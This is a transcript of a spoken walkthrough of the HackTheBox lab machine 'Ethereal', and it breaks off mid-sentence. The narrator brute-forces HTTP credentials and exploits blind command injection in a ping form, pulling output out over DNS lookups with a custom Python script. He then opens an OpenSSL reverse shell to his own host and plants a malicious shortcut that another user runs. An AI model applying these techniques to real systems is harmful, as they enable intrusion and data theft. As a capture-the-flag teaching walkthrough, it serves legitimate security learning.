What's going on, YouTube? This is Ips. I'm going to be doing Ethereal from HackTheBox, and this box is incredibly challenging. So, apologies ahead of time for the lack of, quality. I don't have as much time to prep through this box, and, well, I'm going to make mistakes left and right going through it. And you'll see why I normally don't do, live streams of solving boxes, just because it's so painful to watch, I guess. So, the box itself, it's tough. You got a blind command injection that you got to get data back over DNS, and then after that you have a super restrictive firewall that you have to use OpenSSL to get a shell, and then once you get that shell you have to sign a MSI file, a Windows installer, drop it in a directory, and eventually it gets executed and you get a system shell. So that being said, let's just jump on in. As always, we begin with the nmap, so -sc for default scripts, sv enumerate versions, OA output all formats, put in the nmap directory and call it ethereal, and then the IP address, which is 10.10.10.106. Can take some time to run, so I've already run it. Looking at the results, we have 3 ports open. We have FTP on port 21, and nmap is telling us anonymous FTP login is allowed, but it's also telling us there's a weird error message saying can't get directory listing, passive IP 172.16.249.135 is not the same as 10.10.10.106. So it looks like the FTP server just wasn't reconfigured after an IP change. Essentially, this error message is just saying, hey, the FTP server is telling us to connect back to it on this IP address, and our computer's kind of confused because we're like, no, we connected to you on 10.10.10.106, why are you redirecting us here? So FTP service just wasn't reconfigured. That's how passive mode works, so passive mode probably broken. We'll have to default to active mode if we ever want to access this FTP server. The next thing we see is IIS HTTPD 10.0 on port 80. This means it's going to be a Windows 2016 box, and we don't see anything else really. We also have looks like IIS, which is HTTP API HTTPD 2.0, listening on port 8080. So we have 2 web interfaces and 1 FTP. So the first thing I'm going to do is poke around at that FTP. So FTP 10.10.10.106, I want to say it was. There we go. We'll do anonymous, and the password's going to be anonymous as well. That's just the default for anonymous FTP. And we have, oh god, a lot of files. So if we go into binaries, do a dir, we got MSI, some executables, new folder, has stuff. So let's just download all of this. So to do that, we're going to be using wget with -m to mirror, and then we put the URL, so ftp:// username, which is anonymous at the URL, which is 10.10.10.106. We see it connect, and then it stops when it tries to switch to passive mode. And if we remember, we have passive misconfigured, so we have to put the flag no passive FTP. And it's logging in. And then it starts downloading all the files. If you're wondering how I figured out that flag, you just literally run a man on wget and search for passive, and it tells you no passive FTP disables the use of passive FTP transfer. So while we have that wget running, let's go and check out the web page. So we'll go to 10.10.10.106 and 10.10.10.106:8080. 8080 immediately responds with a invalid hostname, and 106 we have a web page. So the first thing I'm going to do is look at the source code and see if I recognize anything. We have corp image, SD logo, ASPX, so I don't know what this is. Maybe it's .NET Nuke, which is a CMS, but generally if I see like WP-login, I immediately know this is WordPress, or I forget what Joomla's is. But just look at the URL, see the structure, and see if you can identify what the underlying technology of the website is. So let's go to login. Looking at register at the bottom left, we see it just goes to that hashtag sign or pound, so that's nothing. And we got menu, we got the team that goes to the anchor 0, services goes to an actual page, projects doesn't, login, same page we already went, join in, anchor 0, and admin goes somewhere. And all these social media things don't go anywhere. So this assistance page looks interesting. If we click Get Assistance, we get a client ID, email, company, message. So we'll tell them to please subscribe to IPSec. Click Submit, and doesn't really do anything. So let's go again and put this in burp just so we can see the request. So client ID, IPSec, company, or email IPSec at please subscribe me, company website, HackTheBox.eu, message, please subscribe to IPSec. Go over to Burp Suite, intercept is on, click Submit, and we get a bunch of stuff. So I'm just going to send that over to Repeater to take note of it, and then let's move on. So let's go over to the login. We'll log in with admin at test.com, password of password, click login. We get failure. If we go over to Burp, we didn't get anything. We can try logging in again, and man, that swivel is annoying. Click login. Failure. But we get nothing. So we could probably just search through Burp. Let's see. If we look at search by term failure, we don't get anything. Let's enable everything. Matching fail? Huh, I'm surprised Burp doesn't find this. Let's go over this, view the source, and open these and see if we can find it real quick. But because it's not sending anything to Burp when we try to log in, I'm guessing it's just JavaScript that immediately says something. So we can see in the CSS page, the cascading style sheet, we have content is equal to failure and form after. So there's probably JavaScript somewhere that's going to call something that makes this element visible. So I'm just going to go and ignore this login page because unless there's hard-coded credentials, it does nothing. So let's see. We got the admin panel. If we go to menu, let's check out notes, messages, desktop, and ping. And we have intercept set to on, so we can turn that off. Notes, welcome Alan, this is your new console. If we look at the source, don't really see anything. We can try like index2.html, don't get anything. We may want to run like dirbuster or something in this notes directory to see if there's any other hidden notes. The next thing we clicked on was messages, which went to nowhere. Desktop, we got something. If we click on Chrome, we get a HackTheBox picture. Click on File Explorer, nothing. Recycle bin, nothing. User.txt, we have something. Looks like a troll page. I can't click that X. But if we click View Image, all we see is an image. So this page looks like a VDI where we interact with it and we think we're in like a OS in a web browser. But the way it's displaying content is very much just like a bunch of images. So I'm going to say this is a rabbit hole and ignore it. And then the last thing was ping, and that brought us to ethereal.htb:8080. And we don't have that website in our host file, so we don't know who this is. But remember, if we just go to the IP on port 8080, we get invalid hostname. So what I'm going to do is go in my host file, do 10.10.10.106, and put ethereal.htb. Now if we go there now, :8080, it's still waiting. Let's see, intercept is off. Let's just disable burp. Go there, and it prompts us for a username and password. Burp just has a cached DNS if I open burp again. So if we close this and open it, chances are it'll ask us for the password there. So from this, we have a few things we can do. So the main thing we noted was hold on. Password, and with burp now, it asks for its password. So to recap what we saw on this website, we have this login that went nowhere. The main things was services, get assistance. This sends data to the server. And then we also found out the server's hostname is ethereal.htb. And on port 8080, it asks for a username and password. And we also know that there was an FTP server. So I'm going to search through all the data that we downloaded from the FTP server and see if we can find some type of password. So just stay organized. wget name the directory 10.10.10.106. I'm just renaming it to FTP. And let's grep-r-i password dot. And don't see that much. We do see the binary TrueCrypt 7.2 has the word password in it, no duh. And orca.msi, I don't know what that is. So let's go take a look at orca.msi. Instead of reversing it, let's just see how old it is. Because sometimes MSIs will have hard-coded credentials in them if the organization themselves had made the MSI. So that's all we're trying to find out. So I run an MD5 sum on it, and we'll go to VirusTotal. And then we can use the search feature to search for a hash. And VirusTotal finds this. And it even finds that hash is related to orca.msi. There's no viruses in it according to VirusTotal. If we go to details, we can see that its creation time was 2005. The file submission time, or the first submission time, was 2007. So 12 years before the box is made, chances are that MSI doesn't have any good data. We have a chipset.txt. We can look at it. Doesn't look interesting. Look at Team City. Bunch of XML. Doesn't look interesting. And then we got those two zips, disk1.zip and fdisk.zip. So let's make dir zip and copy disk1 and fdisk. And the reason why I'm just doing this outside of the FTP directory is if we want to include this in the report, we don't want to modify any of the files. So unzip fdisk. Because now we could just go to FTP, do find.-ls, and then put that in the report showing all the files we downloaded. But anyways, go to zip. We got disk 1, disk 2, and fdisk. We can check like the disk size with du. We see they're all 1.5 megs. Do MD5 sum. We see they are all different. We can strings them all. And that's odd. We get right away PasswordBox. So we started looking at the FTP server to see if we can find a password for port 8080. And right away we see something called PasswordBox, which looks like it is going to be a program. And if we look at the facts, we see it's some type of encrypted database. And it's also open source. So that's cool. Let's just try mounting these disks. So if we look at mount, we have nothing there. So let's make dir mount disk 1, disk 2, fdisk, and bash will auto expand that and make this all three directories. So now we can mount disk 1 to mount disk 1, 2 to 2, and fdisk to fdisk. So let's go and mount disk 1, and we just get booting information. Disk 2, nothing interesting, and fdisk, there's that pbox thing. So PasswordBox, and it's an executable. If we do ls-la, nothing there, but if we strings these, let's go back to HTTP boxes, ethereal, and then zip strings star. We know it is open source, so I'm going to search PasswordBox GitHub, see if we can find it, and then also SourceForge. And if you did a lot of research on this, you notice it's a like DOS and Linux box program. And if you installed DOSBox on your Linux machine and downloaded a file, you'd be able to get it working. But I find it easier to just download the Linux version and run that. Because if you run it in DOSBox, then you don't have like copy and paste and things like that. So we got the zip. Let's move downloads pbox, unzip this. Make dir pbox. RM changes license pbox. .png, pbox.txt, clean this up, make directory pbox, and now we unzip it in this directory. Okay, so if we run /pbox, we get a error message saying cannot load lib and curses. So let's do app search lib and curses, and we want 5 because it was .so.5. So we download this. And with that package installed, we should be able to execute it. We can't. Let's do file against it. It's 32-bit, so we have to install the 32-bit package of libcurses. So install that one. To specify 32-bit, I just did :i386. And now when we execute PasswordBox, it says a database will be stored at /root/.pbox.dat. So what I'm going to do is copy the pbox.dat file on the share into root.pbox.dat. And now when we run pbox, it asks us for a password. So if we put a password in, it will say rejected. I'm going to guess the password is password and get in. So the password manager's password was just password, and that was a guess. If you don't like guessing, you could just reverse this and try to create a cracker for the hash. I think it's AES encrypted. There is the source code on SourceForge. So if we do code, you could download the source, or you could also just modify the source code to not exit after every password and get rid of that sleeping for 1 second delay and brute force it that way. And I think 0xDF will do it this way. I think he created a brute force for this program. But I just guessed password, and we can navigate through this and get various passwords. So what I'm going to do is quit out of this, and PasswordBox also has a --dump. So I'm going to enter my password of password, and we dumped the database. So let's not send to email. Copy the user pass.txt, and we'll do databases MSDN. Let's see, learning. Not sure what this is. I'll just say the user's FTP there. We got Alan. Just guessing what the username could be here, and we'll make a username and password dictionary. So we'll say management, and then subversion. Okay, so we can do awk-f, and then print 1 on user pass.text, get all the potential usernames, sort-u, users.text, and change this to print 2, and we'll call this pass.text. So now we got 2 files, user.text, users.text, and pass.text. So we're going to feed these files into Hydra and try to get into that port 8080, because we just had HTTP auth here. So ethereal.htb, port 8080, and we're going to use Hydra to try to brute force this. To get the syntax, I'm just going to do Hydra-h, and we can see that -L is a username file, so we'll do -L users.text. -p is the same for a password file, and then we want to specify HTTP ethereal.htb :8080. And there is no service HTTP, most likely you mean one of these many web modules, so we'll do HTTP-get, and we see right away that Alan cracks, or the brute force successful, Alan, and this long password. So let's go and try this. So if we go to ethereal.htb, Alan, paste this in, sure, we can save the password, and we go to a page that says test connection. So we'll test, we'll just put junk. We'll put please subscribe and see what happens. See if we see any error messages that indicate what this is. It says cannot reach desired host and ping address. So let's try 127.0.0.1, ping this, and connection to host successful. So let's do a TCP dump. So we'll do if config ton0 to get our IP address, and then do TCP dump -i ton0 ICMP. And I also want to do -n to not try DNS lookups. So let's try doing 10.10.14.3. Click go, and we can see we get a few ping packets originating from the server. So let's try -n1 10.10.14.3 to make this easier to see. Do this, and we get just one ping packet. If we do that again and do -n2 10.10.14.3, we get 2 ping packets. So this is indication that we're injecting into the command. So the command's probably like ping user input here. And what we're doing is we ping user input, so we put that to be 10.10.14.3, and we can also put arguments. So the question becomes, can we do nested commands, put multiple commands in that? So let's start TCP dump again, and we'll do -n1 10.10.14.3, and then a and ping -n1 10.10.14.3. So click go, and we should see 1 ping and 2 pings. So we have validated that we have command injection. So we could try like -n1 127.0.0.1 and let's go to lolbins. I forget the cert util syntax. So lolbins cert util download So we can try this and put 10.10.14.3. We also want to listen on port 80. And let's just send this over to Burp to make our lives easier for interacting with this. I forgot to intercept it, so we can go to history and send this to repeater. But we see the server never connected back to us. And we can play with it a lot, but we find out eventually it's the firewall that prevents it. So we got to see if there's any way we can get the server to talk to us. After a lot of playing around, it turns out that you can do a DNS request out of the server. So to do that, we're going to, do Control-Shift-U to un-URL encode this, and let's see if I can make this font any bigger. Let's do miscellaneous, display, 16. Oh, Burp has to be restarted. We'll be at small font until next video. But anyways, we got that 127.0.0.1 and I'm going to replace this cert util that did not work with nslookup. We can put anything here. So we can put please subscribe and then the DNS server, which is 10.10.14.3. That is us. Do Control-U. And now we just have to do a TCP dump -I ton 0 VVVV port, I think 53 UDP. I forget how to do this. I hate syntax for TCP dump. A tool called Responder is known for listening for all DNS requests and forwarding poison requests, so I'm just going to use Responder to see if we get any requests. So send this request. That's the command injection nslookup, and we're sending please subscribe, and Responder does see that. So we could also send like a command. So we can do %username% and send the variable of username over to the server, and we'll see we get ethereal. So validated a way to get some type of output of commands we run. So what else can we do with this? If we wanted to run an actual command, it's going to get a little bit dirty in this window. Let's just Control-Shift-U. That went odd. I was just looking at this weird character. So v code inject. So let's see. So we have nslookup and we want to run a command. So we validated we can look up variables. So we got to find a way before nslookup to put the output of a command in a variable. So we can do a for %a in cmd/c. We'll do dir. We'll do who am I. I was just trying to think of a simple command that doesn't have a lot of output. And then do nslookup like this. I think that's the correct syntax. So we'll find out. Let's see if I did that correctly. I really hate batch scripting. Oh, we need to do %a here. So we'll do %a, copy, and paste, and convert to URL. Click go. Look here, and let's hope it responds to us. CMD. So it responded, but not in the way we expected. So let's see. Do we need /f? There we go. We got ethereal. So I don't know where this C, who am I? Oh. If we get rid of all this, click go. There we go. So we can do like dir. I think /b is only going to output one column. Let's see what happens. So now we're getting the output of dir very, very slowly. So I'm going to go over and turn on my Windows VM because how slow this output is, it's really painful to do testing this way. Much better to just run the commands on Windows and see the output instantaneously and then push what you think is valid to the server. So let's switch over to Windows. So the main reason I wanted to switch to Windows was to show the issue we're going to have. So the command we sent to the server was this /f%a in dir/b do echo %a. This was an nslookup, but we're just doing echo because it's easier. So we see that just outputs all the directories one by one, which is fine. However, if we don't have that /b, it's only going to output the very first column of output. So if we want to get extra output, we have to do like /f tokens equals 1, 2, 3, and then dir a, b, c. It's tokens goes before the variable. So now we're getting more. If we do 1, 2, 3, 4, 5, 6, and then the variables will be A, B, C, D, E, F. And we can get output. So now we know how to get output out of this command. We can begin trying to script it. So let's go back over to a Linux box and start creating a Python script to do this weird command injection and printing out the results over DNS. So let's v ethereal.py, and the very first thing we want to do is start off with Scapy so we can actually get the results of the output. Instead of writing this all from scratch, let's go to Google and pull some skeleton code. So we'll Google Scapy thread Python and go to this first blog post. It is by skypelabs.net or skiplabs.net. And we can copy this code, set paste, paste it in, and go through it. So the first line, importing Scapy, which again is like a TCP dump for Python. Threading, so we can put the listening process in the background, which lets us do things while listening for packets. Let's see, class threading, or class sniffer as a thread. Interface, we want ton 0. Run, so sniff on interface ton 0, all IP packets. And for every packet, do this print packet function. Print packet is going to do something, and that's it. So let's do Python 3, ethereal.py, no module name Scapy, so pip3 install Scapy, and failed building, but we have it just saying no directory license. Looks like it works. Let's go to boot, click go. Are we going to print any packets? We are printing packets, so we should be fine. I'm not sure what's wrong with Scapy there, but oh well. So let's go back into our code, and what we want to do is print DNS packets only. So we want to do an if packet has layer DNS, then if packet dot destination port is equal to 53. That means it's making a DNS request to us. Then we want to print packet. So let's see what this does. So Python, invalid syntax. Let's see. I need 2 parentheses here. So we started sniffing. We can click go. Oh. Not sure when that happened. There we go. Now we click go. Runtime error. The application is not working. So let's go back here, ping -n1, and then we want to do nslookup test 10.10.14.3. Click go. I'm not sure what's going on with this application. So I may just have to revert the box. Okay, that was good. 127.0.0.1 nslookup test 10.10.14.3. Go. Intercept is set to off. Okay. Looks like that error went away, and we printed a few packets. And we can see test is right there. So we just got to figure out how to filter all this to only print test. So let's open this back up and go back to Google and search for query name Scapy. And the second result says DNS packet injector. And if you're injecting packets, you have to be able to detect packets. So let's see what this is doing. So has layer IP. We already did that. TCP or UDP has layer DNS. DNS ID is packet ID, QD, and query name. So we probably want to copy all these. So DNS ID, DNS QD, and DNS QName. ID we probably don't have to keep because we're not injecting packets back, but query name we want. So let's go back to our code and say QName is equal to packet.qd.qname. And then since this is Python 3, we have to decode this. Unless we're going to get a bunch of like B's before we print. I can actually show that. Okay. So let's do qtype is equal to p.qd.qtype. And we can print qname, print qtype, and pray we don't have a syntax error. So execute this, go here, do an nslookup, and we see a reverse lookup, then a lookup, and then test again. So 12 is the query type for reverse lookup, 1 is the query type for request, and 28 is going to probably be the response. So what we can do is do if queue type is equal to 1, then we print queue name. So now when we run this, oh, you could also see this B single quote. So if we put this decode in now, that'll go away. So we can see it only responds with test. So we can begin now working on the other piece of the script, and that is having the Python code actually do the code execution. So we're going to need a few more modules. So we'll do import requests. And we also want to do something called BeutifulSoup, which is going to make parsing HTML much easier, because if we look at, we have a lot of cookies to set once we log in. We have this view state generator, event validation, search. It's going to make that easier. So import that module, and then we also will have to do the base64 HTTP authentication. So from requests.auth import HTTP basic auth. Okay, and we need a from CMD import CMD. So let's work with the command line first. We do class terminal CMD prompt is equal to that, and then def do CMD self args print args. So we got the terminal there. I don't know what this is. Let's see if we can just get rid of this and then do terminal is equal to terminal.command loop. So now when we execute this, it doesn't work. Let's see, sniffer, command. Oh, we need a function. So now run this with Python 3. We get this. So the terminal is there. We can verify that while that works, we can sniff. So CMD test and CMD who am I, and then we get the response test. So that was the DNS request coming as we're doing commands. So all that works. So now we just have to log into the website. So let's do def init self and CMD init self.auth is equal to HTTP basic auth. Username was Alan, and the password, do we have it here? We can just Hydra it again. Here's the password. So Alan this. So we can print self.auth. Didn't print as we thought it would, but that should be fine. So the next thing we can do is page is equal to request.get HTTP ethereal ethereal.htb :8080. Then auth is equal to self.auth. And we can print, I think, page.text. Let's see. Yep. So we got the page, and in order to do the submission, we need to include all this information. It acts like a cross-site request forgery, kind of, because if we just let's just take the view state parameter out and see what happens. So we take this out, click go, and it says nothing. So need that in there for this to work. And so redo. I'm not sure what I screwed up now. Oh well. Anyways, we have to take all these variables and put them in as parameters. So that's where BeutifulSoup's going to come in, because it makes doing that really easy. So we can do soup is equal to BeutifulSoup page.text, and we're going to pass it through the HTML parser. And then self.viewState is equal to something, self.viewStateGeneral or generator is equal to something, self.event validation, and then self.ctl02, I guess. So viewState soup.find input, and then name viewState, and we want the value of that. Let's see. Did I close all those out? Yep. So that's it. That's all soup is doing. You just need to know the magic syntax: input, name, and all we're pulling is, if we take this out, it's searching through here and pulling, where's name? Pulling name, viewState, name, viewState generator, and the value came from here. So name, viewState, viewState. So select name, grab where name is equal to viewState generator, grab value is essentially what we're doing. So hopefully that makes sense. This one will be viewState generator. I need to put this in quotes. Value soup.find input name is equal to, this is event validation, value, and the last one is CTL. Input name CTL02, value. So we can try printing all these. So print self.vs, print, we'll just do 2, self.ev, run this, Response object has no text at line 15. 15, soup, page.text, forgot the E. And because that did not exist, because it's CTL02, yep. Let's see. There we go. So we printed both of them. So now we have the login to the page done. We can now do a command. So let's just do default. Def default self args. And this is going to be, let's see, cmd is equal to, we need to do that still. Data. And now we just have to wrap all of these up. So view state, self.vs, then view state generator, self.vsg, event validation, self.ev, and this will be CTL02 self.ctl. So that's done. Then we'll do request.post http ethereal.htb 8080. Data is equal to data, auth is equal to auth. And the last thing we need to do is the command. So how do we send commands? It's through search, and it's just above CTL. So we can do search is equal to cmd. So now we just have to have what a command is. So F, and that F is going to make it so we can just do commands in brackets, triple quotes, because we're probably going to go in and use a lot of quotes. And triple quotes, like if I did print like that, it would just print the double and single. When you do triple, it doesn't evaluate single or double. Doesn't evaluate those, so you don't have to worry about escaping a bunch of stuff. So I like doing triple quotes around complex things. So this, and then we do for/f tokens equals 1, 2, 3, 4, 5, 6 percent %a, and this will be cmd. And I think we put this in single quotes or double quotes. It probably doesn't matter. Do nslookup %a %b c d e f. Then 10 10 14 3. So I think that's right. And of course, it's not. Let's see. F. What did that say? Single is not allowed. An extra character. So if I do who am I? CMD reference before assignment. Huh. I wonder if it's just because it doesn't like that variable name. Command. We'll do inject _ command. I guess. Oh, shoot. This is args. And this can stay CMD. There we go. Who am I? Auth is not defined. Auth is equal to self.auth. Who am I? And we wait for the response. And we get 2. And the reason why we're getting 2 is because we have responder off. The server, we actually got more than 2. But the server is sending a request, not getting a response, and sending another one. So I start up responder so we don't have to inject DNS packets back to respond. But we can do now dir and see the output of this. Now I'm going to speed up the video whenever I do these commands, because as you can see, it takes like 1 to 2 seconds between lines, which means this video would go really, really long if we did not speed it up here. So I'm actually going to just let this keep running because I'm tired of waiting, and we're going to edit the script. And if you noticed, it's not really the easiest to read output. There's no spaces or anything, and it's just doing big DNS requests. There's a number of characters that can be done in a single, like, I don't even know what it's called. If we go to like admin.hackthebox.eu, there's a certain number of characters that can be placed here. And the way we're doing the request is we're just putting everything in one. And we know that we kind of can loop by like spaces. Like this is %A, there's a %B, and there's a %C. And they should all be different words. So we could place items in between them, and then we'll be able to grab the spaces. So what we're going to do is edit the script again. And this time we're going to change this tokens, and we're going to do tokens and 1 to 26. That's going to be for every letter in the alphabet. And then we're going to do an nslookup for q %A z period q %B z period. And these are just characters that probably won't appear that frequently. And the reason why we're doing this is then our script can just grab everything between capital Q and Z period. And that will let us get the output be a little bit cleaner. So I'm going to use bash to help me create this. So we can do for I in a Z, do echo I, done. And that's going to print all the letters in the alphabet. So we can do echo Q $I Z dot. Did not work. We have to put I in these brackets. There we go. And do a -n. So now we have 26 tokens. So we can copy this, paste it here. And we're doing this because one of the commands we're about to run will require a lot of tokens, and if I run it, then the box is dead until like 5 or 10 minutes. I'm lazy. So I'm just doing this ahead of time, and hopefully it works the first time I run this command, because if it doesn't, it's a long wait. So we got all that. Now we have to go back down to a sniffer and change how we're doing the printing, because we can't just print QName now, because if we did that, we'd get a whole bunch of mess. We can try it and just do like a who am I, and you can see what the output looks like, and it won't be pretty. So that's what the output looks like. So now we got to just tell our Python script to grab everything in between. So let's go back into ethereal, and we're going to print qname.replace. We're going to replace every z.q with a space. And then we'll strip it, because actually we won't strip it right away. I can show you what happens. So if we now execute this, do who am I, we see a bunch of spaces here, and then z period, because we're replacing z.q, so it doesn't replace this, and it doesn't replace this q. So what we're going to do is remove the first character and the last two characters, and then strip all the spaces at the end. And then we'll get a much cleaner output. So remove the first character and the last two, and then do .strip. And now when we run this, who am I? And we're good. So now we can do like dirc:, which is hopefully going to be a smaller output than the last one. And we should see what this looks like. So that looks much more promising. And now this output is looking like a traditional shell. We're just extremely, extremely slow. There is the issue of every now and then there's just characters we can't put in a DNS hostname, like slashes. So that's why we don't see it here. But having this shell means we can actually do enumeration now and read the output. So speeding up the video again, getting rid of this, and then we'll run a few commands that print some pretty cool information. The first command I generally run is set, and this is going to print the entire environment variable. And while that runs, I know the dirc: showed this directory. The reason why it didn't do c:\/ is because we didn't put the backslash in it. So yeah, but this is printing the environment variable, which kind of tells us what our running context is. So we can see like all user profile, things like that. So speed this up again so we can get this out of the way. So I think that's done printing. The next command I do is like who am I /all, and this is going to list all the privileges and tokens and whatnot. So let this one run. So we can see that our user is Alan. There's probably supposed to be a backslash here, but there isn't. And our username up in the set was ethereal. And that's because we have that SE impersonate privilege and can most likely use rotten potato on the server once we get a shell. So we are the system user, but we are impersonating Alan. Or we're Alan impersonating this. I don't know which way it works, but we can see we're Alan. So let's go to dir:\users Alan desktop to see if he has any flag on his desktop. So doing a dir there. And you could also do dirc:\users and go in everyone's directory, but I'm going to start doing less commands than I expected just because I've killed like 10 minutes waiting for all the output to go through. This was the most painful part of the box. So we see his desktop doesn't have the flag, but it does have note-draft.txt. So I'm going to do type to view the contents of this. And we can see I've created a shortcut for Visual Studio on the public desktop to ensure we have the same version. Please delete any existing shortcuts and use this one. We can also do commands like PowerShell who am I to see if PowerShell works, but it doesn't. I kind of skipped that whole part once we got command injection, but there's app locker on the system, and that's why we didn't go for a reverse shell right away. So if we do a dirc:\users public desktop, we see there's a directory shortcuts. So if we do a dir in that, we see it's just a shortcut to Visual Studio, and we can run type against that. Put this in quotes, Visual Studio 2017.lnk, and see the contents. Or maybe we can't because it has a lot of bad characters, but we have to figure a way to probably get on this box because based upon that note, I'm guessing someone executes this shortcut. So the first thing I did was start enumerating the firewall. So I did netsh adv firewall show rule name is equal to all, direction is equal to out, find string /c name. And before I do this, because it takes like 15 to 20 minutes probably to get all the output, I am testing it on my box. Okay, so that's what we want. Gonna run this, and then again speed up the video for quite a while. Oh, it did not run. So let's go out of our shell and think if we can find why. I'm just going to do cmd/c. I'm going to replace these quotes with this, and maybe just opening it in a new command prompt gives it time to run or something. So let's just see if that works. Copy, paste. And I think when I was doing the box, I found that out through trial and error by going through my Windows box. But now we're outputting rule names. So we'll let this finish and see if there's any non-default rules that help us. And as we're going through, did it actually finish all the rules? Was that it? I don't think I ran it with output last time and it took so much longer. But we do have a few rules that are interesting. UDP port 53, this is going to be for DNS request, ICMP request, and TCP port 73 and 136. The issue is we have to find a way to make a connection on one of those ports. And to do that, I went into program files, and the easiest way to go into program files I do is progro1 or progro2. Maybe that got patched. Oh no, cd /cd progro1 is going to be program files, and then progro2 is going to be program files x86. That's short file name, SFN, I believe, in Windows. You can do more research on that, but it just helps when there's weird characters. Like, I hate putting parentheses and stuff in commands. So let's do dir c:\progra2 and see what programs are installed on this computer, because we have to find a way to get a connection back to us. So now we're just hunting around for like netcat or something like that. We can see that OpenSSL is installed on the computer, and doing a search on like lolbins, let's see, is it here? Yep, lolbins. If we look at like OpenSSL, does this have anything? No. If we Google OpenSSL Windows reverse shell, we should find plenty of hits. So let's see. This one. We generate the certificate. This is a Linux one. Let's do this. This is on Walmart cheat sheet. Windows cheat sheets. So let's see. OpenSSL. Let's see. One of these is going to be it. Windows key cert. Here we go. So OpenSSL, S-Client, quiet, connect, CMD, and do it again. And I think this side is standard in, this side is standard out. So let us actually I'm going to do this in a new window because copying when it's split vertically is a hassle. So let's make the directory SSL, make the directory go in SSL, and we have to make the certificates first. So open SSL request -x509 new key RSA 4096 key out key.pem -out cert.pem days a year and then nodes. Do all the defaults here. Now we got certificates. So we can do open SSL, then it's, do they have it here? As server. And I really don't like that quiet output. It's not too noisy, but it tells you when it connects. So -key and -cert -port is what we need. So key is going to be key.pem, cert will be cert.pem, port we said 73 and 136. So 73, 136. So we're going to try to do, actually before we do this, since we're doing a reverse shell, we don't need this whole crazy syntax because we're not getting any output. So we're going to use this do command. So 1, 2, 3, 4, 5, 6, 7, 8, 9. 9 lines. So I'm going to do 9, double Y for yank. And then we can P for put and delete all this. So -n 127.0.0.1 and any command we want. So we wanted cmd/c ergs. We can put that in double quotes. So this command injection's just a lot cleaner than doing all this. So it kind of limits the damage we can do. Or it limits the, I guess, I don't know what I was saying. Limits the weirdness because it's much more standard. So now we got to do the command. So it's, whoops, c:\progra2 open SSL -v1.1.0. I think that's what it was. Open SSL v110. Yep. And then bin open SSL.exe. We can do s client -connect 10.10.14.3 port 73. And before we do like a reverse shell or anything, we can just make sure we connect. So 73, we get a connection here. So we're good. Go back here. Wait for us to get a command prompt back. If not, we'll just kill it. Just kill it. So now we can do cmd.exe. Paste this again. And do 136. So go open SSL. And I have no idea what it's printing. but we get a shell. If I do dir, maybe this is where I want quiet. We get no output. So let's do quiet here, dash QUIET. Go here. And copy this. V command. Just making sure this copies on one line. A lot of times when you copy and paste out of tmux like that, it copies the line breaks too between terminal lines. Okay, connected. And I don't know what all this is, but we don't get any output. And the reason for this is if we go back here, if we do cmd/c cmd, it launches a CMD in that window. If we use this command start, it's going to open a new window. And that's going to make all the difference right here. I think, because this whole thing is new to me. So let's try this again with putting start before command. Run this. And we can copy this. Paste. And it's still going through. Oh, I wonder if, so this is standard in, and this is standard out, and whenever we connect, it's spewing all this stuff. So I wonder if we do dash quiet here, on the standard inside, and cat cmd, copy this, paste, restart our OpenSSL, and see, there we go. So now we have command a shell. We have standard in up here, standard out down there. So if we do cd users and cd public desktop shortcuts, that's where it was. We could type Visual Studio 2017.link. And we can see the link goes to the D drive. And if we try to go to the D drive, we can't. If we do iCackles on this link to look at the permissions, we can see that everyone can modify them. So if we do a dir, we can echo hello to this. And then dir, we can see we have overwrote that link. So we do have control of the link. We just have to be able to copy a file to this server. So easiest way to do that is through OpenSSL. So we can, well, before we do any OpenSSL, we have to go back to Windows and create a malicious shortcut. Whoops. Let's do tmux attach -t htb to attach again. Yeah, we have to go to Windows to create a malicious shortcut. So let's switch over to Windows. So now that I'm on Windows, I can just type PowerShell so we can create the shortcut. We could do this through the GUI, but I just like doing it through PowerShell because if we were on the target and it didn't have app locker, we would be able to just do this there. So wscript new object com wscript.shell. And now we got the com object created. We can create the shortcut is equal to wscript dot create shortcut. Please subscribe .lnk. And we can do, and just because we did create shortcut doesn't mean it created it. It just created the object where we have all these variables. So we can do shortcut dot, let's see, target path is equal to c:, Windows, system32, cmd.exe. We can do sc dot arguments is equal to c:, /c, and then we have to copy all this OpenSSL crap. So go back to this box, go here, copy this, paste. We don't need cmd because that's our argument. Okay. sc to print it, we see the arguments, we see the target path, so we do sc.save, and now we do dir, and we got that please subscribe.link. So to copy it onto a box, let's create a directory called well, we'll do it in the SSL directory because that's where our keys are, and that's where OpenSSL is. So mpacket -smb server -smb2 support, call the share files, and link it to a current directory. Before we do that, we have to kill responder. Okay. If config eth0, I'm 10.190. So 172.16.10.190. Put the shortcut here. Go back to the box. And we want to do, let's see, cmd OpenSSL connect port 73. And we want to direct that to c:, users, public, desktop, shortcuts, and that's going to be please subscribe.lnk. We want to get out of our OpenSSL shells, and on port 73, we're sending please subscribe back through it. Hit enter. Give this a little bit. We should see the output. Huh. Let's see if it transferred. Connect, and do we have it here? Copy, paste, cd, users, public, desktop, shortcuts, dir. We have please subscribe.lnk there. So we can type that and get it. So what we have to do is copy this over, copy please subscribe.lnk over top of Visual Studio 2017.lnk, and then immediately restart our shells because it's like on a 5-second loop or something. So we don't have much time to do this. So copied, sent, and I should have done /y because right as I closed it, it said overwrite. So send this again. cd users public desktop shortcuts, copy please to Visual Studio 2017.lnk. Yes. Copied. Start these back up. And hopefully he clicks it. If not, we'll just send it back through and try again. So let's try this again. Unfortunately, you have to be extremely fast here. And then once we do this, we're going to do something really cool and get a regular shell working. We're going to bypass app locker. So I don't know why I've tried to send it through again. I didn't have to do that because we didn't remove it. We just moved it or copied it. Okay, cd users public desktop shortcuts, and then copy /y please over top of Visual Studio 2017.lnk. Copied. And I think I missed it. We see it came through on this one, but not this one. So, try again. This time we'll definitely get it. cd users public desktop shortcuts, copy /y please Visual Studio 2017.lnk. Ready, go. So we copied it over top, didn't make a typo, and I'm not getting the shell. This is getting frustrating. I wonder if I created that shortcut wrong at this point. So we'll do this one more time, and then we're just going to do app locker bypass, because I don't like this. So copy please subscribe.lnk. Oh, we don't have to be short. I'm being a stupid. So we can list it on these ports, and I can just use this. So we can do cmd copy /y c : users public desktop shortcuts please subscribe. Oh, shortcuts. Yeah. Please subscribe.lnk over top of copy this, paste, go over here, copy, paste. There we go. That's probably the way we're supposed to do it. Give this a few seconds, and hopefully it copies over. There we go. That's how you're supposed to do it. So now we're on George. If we go cd.dot, cd desktop, we have user.txt. So if you remembered back in the beginning, there was a D drive we didn't have permission to. So I'm going to try going to D. That was where Visual Studio is installed, and now we can get to it. There's a few directories: certs, dev, program files, and program data. If we go into certs, we have myca.cir and myca.pvk. And if we go into dev, we have MSIs. If we look at 